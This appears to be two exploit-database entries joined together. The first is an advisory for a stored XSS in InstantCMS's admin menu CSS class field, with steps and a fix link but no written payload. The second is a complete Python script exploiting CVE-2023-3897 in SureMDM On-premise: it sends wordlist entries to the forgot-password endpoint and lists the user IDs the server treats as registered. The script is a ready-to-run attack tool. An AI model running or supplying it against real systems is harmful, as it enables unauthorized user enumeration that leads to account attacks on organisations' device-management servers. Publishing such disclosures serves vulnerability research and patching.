<pre><code># Exploit Title: InstantCMS - Stored XSS<br /># Application: InstantCMS <br /># Version: v2.16.1 <br /># Bugs: Stored XSS<br /># Technology: PHP<br /># Vendor Homepage: https://instantcms.ru/<br /># Software Link: https://instantcms.ru/get<br /># Date: 14.09.2023<br /># Author: SoSPiro<br /># Tested on: Windows<br /><br />## Description<br /><br />I noticed that the input is filtered very carefully, but there are still some parts that were missed.<br /><br /><br />## POC<br /><br />1. Log in as admin<br />2. Go to "http://localhost/o2/admin/menu/item_edit/18"<br />3. Insert the payload in the CSS class field<br />4. Click save, then go to the home page; the stored XSS is triggered in the footer<br />https://drive.google.com/file/d/1_9QGoBnbZZrsHUgNkujja1Ptj3f8fl2W/view?usp=sharing<br /><br /><br />## Impact<br /><br />This vulnerability can be used to steal users' cookies, gain unauthorized access to their accounts through the stolen cookies, or redirect users to malicious websites.<br /><br />## Bug fix commit<br /><br />https://github.com/instantsoft/icms2/commit/b2172a0f842fc28966b00bab3e2e9094c6bfd156<br /><br /><br />## Reference<br /><br />https://huntr.com/bounties/18546c85-de6a-4252-a02f-c9d26f4f775e/<br /></code></pre>
# Exploit Title: SureMDM On-premise < 6.31 - CAPTCHA Bypass User Enumeration
# Date: 05/12/2023
# Exploit Author: Jonas Benjamin Friedli
# Vendor Homepage: https://www.42gears.com/products/mobile-device-management/
# Version: <= 6.31
# Tested on: 6.31
# CVE : CVE-2023-3897

import requests
import sys


def print_help():
    """Print the usage line and terminate with exit status 1."""
    print("Usage: python script.py [URL] [UserListFile]")
    sys.exit(1)


def _read_user_list(path):
    """Return the lines of the wordlist at ``path``.

    Exits with status 1 (after printing a message) when the file does not exist;
    any other I/O error propagates unchanged.
    """
    try:
        with open(path, 'r') as handle:
            return handle.read().splitlines()
    except FileNotFoundError:
        print(f"User list file '{path}' not found.")
        sys.exit(1)


def _looks_registered(url, bypass_dir, enumerate_txt, user):
    """Return True when the forgot-password endpoint answers HTTP 200 without
    the 'not registered' text in ``d.message``.

    Only a 200 response is inspected; every other status is treated as
    "not registered". The response body is the sole oracle here, which is
    why a uniform server reply for known and unknown identifiers closes
    the enumeration.
    """
    response = requests.post(
        f"{url}{bypass_dir}",
        json={"UserId": user},
        headers={"Content-Type": "application/json; charset=utf-8"}
    )
    if response.status_code != 200:
        return False
    message = response.json().get('d', {}).get('message', '')
    return enumerate_txt not in message


def main():
    """CLI entry point: ``script.py URL USERLIST``.

    Reads identifiers from USERLIST, queries the reset endpoint once per
    identifier with a progress line on stderr-style carriage return, and
    finally prints the count and the identifiers the endpoint accepted.
    """
    if len(sys.argv) != 3 or sys.argv[1] == '-h':
        print_help()

    url, user_list_file = sys.argv[1], sys.argv[2]
    users = _read_user_list(user_list_file)

    bypass_dir = "/ForgotPassword.aspx/ForgetPasswordRequest"
    enumerate_txt = "This User ID/Email ID is not registered."
    total = len(users)
    valid_users = []
    for position, user in enumerate(users, start=1):
        percent = position / total * 100
        print(f"Processing {position}/{total} users ({percent:.2f}%)", end="\r")
        if _looks_registered(url, bypass_dir, enumerate_txt, user):
            valid_users.append(user)

    print("\nFinished processing users.")
    print(f"Valid Users Found: {len(valid_users)}")
    for user in valid_users:
        print(user)


if __name__ == "__main__":
    main()